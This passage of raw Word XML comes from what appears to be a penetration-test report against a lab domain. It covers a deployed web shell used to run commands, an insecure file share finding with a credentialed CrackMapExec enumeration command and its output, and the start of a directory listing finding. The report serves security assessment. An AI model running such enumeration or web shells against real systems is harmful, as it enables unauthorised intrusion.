            <wp:effectExtent l="57150" t="114300" r="114300" b="615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43355"/>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7966B121" w14:textId="302BA61E" w:rsidR="008241F8" w:rsidRDefault="004B0583" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Deploying Web Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031ED440" w14:textId="77777777" w:rsidR="004B0583" w:rsidRDefault="00655232" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="ImageFormat"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77683EA1" wp14:editId="6B35E413">
            <wp:extent cx="6858000" cy="852170"/>
            <wp:effectExtent l="57150" t="114300" r="114300" b="62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58000" cy="852170"/>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46CAF106" w14:textId="15908A7E" w:rsidR="008241F8" w:rsidRDefault="004B0583" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Web Application Deployed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32158763" w14:textId="3EE259B8" w:rsidR="008241F8" w:rsidRPr="004B0583" w:rsidRDefault="004B0583" w:rsidP="00520B63">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B0583">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
        <w:t xml:space="preserve">With this web shell in place, the tester was able to run commands on the underlying server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EA2146" w14:textId="77777777" w:rsidR="004B0583" w:rsidRDefault="00655232" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="ImageFormat"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2177AA28" wp14:editId="0346EA4E">
            <wp:extent cx="6858000" cy="2788285"/>
            <wp:effectExtent l="57150" t="114300" r="114300" b="501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58000" cy="2788285"/>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1D56949D" w14:textId="651DC316" w:rsidR="008241F8" w:rsidRDefault="004B0583" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Running ipconfig Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EFD015" w14:textId="132A067B" w:rsidR="008241F8" w:rsidRPr="004B0583" w:rsidRDefault="004B0583" w:rsidP="00520B63">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B0583">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
        <w:t xml:space="preserve">From here it would be possible to leverage user account privileges to escalate to the powerful NT AUTHORITY\SYSTEM account and begin to enumerate the Active Directory domain. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3CAF21" w14:textId="77777777" w:rsidR="004B0583" w:rsidRDefault="00655232" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="ImageFormat"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BA3ECA2" wp14:editId="7EDBEC50">
            <wp:extent cx="6858000" cy="2070100"/>
            <wp:effectExtent l="57150" t="114300" r="114300" b="63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58000" cy="2070100"/>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3CF6CA8E" w14:textId="151B0C7F" w:rsidR="008241F8" w:rsidRDefault="004B0583" w:rsidP="004B0583">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Confirming Account Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4583FC35" w14:textId="6D52ED3D" w:rsidR="00FE3E30" w:rsidRDefault="00FE3E30">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD507A3" w14:textId="32A908DA" w:rsidR="00FE3E30" w:rsidRPr="00520B63" w:rsidRDefault="00FE3E30" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="FindingTitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Insecure File Shares</w:t>
      </w:r>
      <w:r w:rsidRPr="006372B6">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ED7D31"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="MediumFinding"/>
        <w:tblW w:w="11016" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2358"/>
        <w:gridCol w:w="8658"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="6906CC84"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1092A720"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65221EDC" w14:textId="799C7E5F" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579"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43" w:history="1">
              <w:r w:rsidR="00010F23" w:rsidRPr="00010F23">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>CWE-284</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="4E2AF293"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44E0C1B0" w14:textId="77777777" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00FE3E30" w:rsidP="00A40765">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVSS 3.1 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D735FB1" w14:textId="03A8EAE4" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00010F23"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6.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="5AD2BEF6"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0A8D32F"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47BA8D7D" w14:textId="3FD4773E" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00010F23" w:rsidP="00DC3356">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0F23">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The tester uncovered multiple file shares where all Doma</w:t>
            </w:r>
            <w:r w:rsidR="00DC3356">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>in Users have read/write access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="2B5D597D"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1F4D94D"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09415B6F" w14:textId="74C63D62" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00010F23"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attacker who gains a foothold in this domain can use this access to search for files containing sensitive data such as credentials and potentially write malicious files to the file shares.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="64B40CFC"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373ED1AC" w14:textId="0D54E8E8" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00FE3E30" w:rsidP="005345C1">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected </w:t>
            </w:r>
            <w:r w:rsidR="005345C1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FFE9556" w14:textId="4930D474" w:rsidR="00FE3E30" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="005345C1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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5345C1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="3342061D"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A630C6A"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596282D5" w14:textId="61932295" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00DC3356" w:rsidP="00DC3356">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Review file share privileges to ensure that users are granted access in accordance with the principal of least privilege. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="106FCA5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06F14D1F"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722855C8" w14:textId="004739F0" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579"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44" w:history="1">
              <w:r w:rsidR="00DC3356" w:rsidRPr="00AC16CA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1135/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00DC3356">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DB2673D" w14:textId="77777777" w:rsidR="00FE3E30" w:rsidRDefault="00FE3E30" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="EvidencePreamble"/>
      </w:pPr>
      <w:r>
        <w:t>Finding Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402F82ED" w14:textId="08CF86EE" w:rsidR="00FE3E30" w:rsidRDefault="00302E45" w:rsidP="00FE3E30">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Viewing file shares accessible to a stan</w:t>
      </w:r>
      <w:r w:rsidR="00BF25A8">
        <w:t xml:space="preserve">dard Domain user with the </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="00BF25A8" w:rsidRPr="00BF25A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CrackMapExec</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BF25A8">
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE3E30" w14:paraId="32F76D93" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
          <w:trHeight w:val="96"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="410F11DE" w14:textId="325A0938" w:rsidR="00544EFF" w:rsidRPr="001E1051" w:rsidRDefault="00544EFF" w:rsidP="006E787B">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00544EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001E1051">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>sudo crackmapexec smb 192.168.195.205 -u asmith -p &lt;REDACTED&gt; --shares</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D7EE727" w14:textId="77777777" w:rsidR="001E1051" w:rsidRPr="00544EFF" w:rsidRDefault="001E1051" w:rsidP="006E787B">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A2D4B56" w14:textId="77777777" w:rsidR="00544EFF" w:rsidRPr="00544EFF" w:rsidRDefault="00544EFF" w:rsidP="006E787B">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00544EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.205 445    MS01             [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36B01ABA" w14:textId="7629DE14" w:rsidR="00544EFF" w:rsidRPr="00544EFF" w:rsidRDefault="00544EFF" w:rsidP="006E787B">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00544EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.205 445    MS01             [+] INLANEFREIGHT.LOCAL\asmith:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;REDACTED&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00544EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CFE2E69" w14:textId="77777777" w:rsidR="00544EFF" w:rsidRPr="00544EFF" w:rsidRDefault="00544EFF" w:rsidP="006E787B">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00544EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.205 445    MS01             [+] Enumerated shares</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E4727A4" w14:textId="77777777" w:rsidR="00544EFF" w:rsidRPr="00544EFF" w:rsidRDefault="00544EFF" w:rsidP="006E787B">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00544EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.205 445    MS01             Share           Permissions     Remark</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AC8B2F1" w14:textId="77777777" w:rsidR="00544EFF" w:rsidRPr="00544EFF" w:rsidRDefault="00544EFF" w:rsidP="006E787B">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00544EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.205 445    MS01             -----           -----------     ------</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3085A4C3" w14:textId="77777777" w:rsidR="00544EFF" w:rsidRPr="00544EFF" w:rsidRDefault="00544EFF" w:rsidP="006E787B">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00544EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.205 445    MS01             ADMIN$                          Remote Admin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="120EA52F" w14:textId="77777777" w:rsidR="00544EFF" w:rsidRPr="00544EFF" w:rsidRDefault="00544EFF" w:rsidP="006E787B">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00544EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB         192.168.195.205 445    MS01             Backups         READ            </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56E3B578" w14:textId="77777777" w:rsidR="00544EFF" w:rsidRPr="00544EFF" w:rsidRDefault="00544EFF" w:rsidP="006E787B">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00544EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.205 445    MS01             C$                              Default share</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78B59BAD" w14:textId="77777777" w:rsidR="00544EFF" w:rsidRPr="00544EFF" w:rsidRDefault="00544EFF" w:rsidP="006E787B">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00544EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.205 445    MS01             IPC$            READ            Remote IPC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A2228F1" w14:textId="77777777" w:rsidR="00544EFF" w:rsidRPr="00544EFF" w:rsidRDefault="00544EFF" w:rsidP="006E787B">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00544EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB         192.168.195.205 445    MS01             Migration Data  READ            </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F8D18A7" w14:textId="3B899160" w:rsidR="00544EFF" w:rsidRPr="00A85D5C" w:rsidRDefault="00544EFF" w:rsidP="004539C5">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001E1051">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.205 445    MS01             Software        READ,WRITE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21643F17" w14:textId="28D0D7CE" w:rsidR="00DA6F73" w:rsidRDefault="00BF25A8" w:rsidP="00BF25A8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Listing Accessible Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F582A65" w14:textId="77777777" w:rsidR="00DA6F73" w:rsidRDefault="00DA6F73" w:rsidP="00520B63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCF72CF" w14:textId="77777777" w:rsidR="008241F8" w:rsidRDefault="008241F8" w:rsidP="00520B63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE8F624" w14:textId="77777777" w:rsidR="00FE3E30" w:rsidRDefault="00FE3E30">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5737AC34" w14:textId="19C54FE4" w:rsidR="00FE3E30" w:rsidRPr="00520B63" w:rsidRDefault="00FE3E30" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="FindingTitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Directory </w:t>
      </w:r>
      <w:r w:rsidR="00F75CFC">
        <w:t>Listing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Enabled</w:t>
      </w:r>
      <w:r w:rsidRPr="006372B6">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3E30">
        <w:rPr>
          <w:color w:val="006600"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="LowFinding"/>
        <w:tblW w:w="11016" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2358"/>
        <w:gridCol w:w="8658"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="65A23771"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0DD61ABD"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69CC81F3" w14:textId="0B4F05B3" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579"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46" w:history="1">
              <w:r w:rsidR="00F75CFC" w:rsidRPr="00F75CFC">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>CWE-548</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="06C6AD9D"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1B35E709" w14:textId="77777777" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="00FE3E30" w:rsidP="00A40765">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVSS 3.1 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DECF6D8" w14:textId="0D6DB8DE" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="005D392C"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4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="12DB25FD"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0EFF1E4E"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6C3A47A3" w14:textId="291871B9" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="005D392C" w:rsidP="00A40765">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The web application exposes a directory listing of some files in the web root and subfolders.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3E30" w:rsidRPr="00B96066" w14:paraId="3FAB45B3"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7C4D126E"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33C8F6A7" w14:textId="3643DFF8" w:rsidR="00FE3E30" w:rsidRPr="007D1F5C" w:rsidRDefault="005D392C"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severity of this finding depends on the sensitivity of the files exposed on the web server. If the directory exposes only files intended for public </w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A">
              <w:rPr>
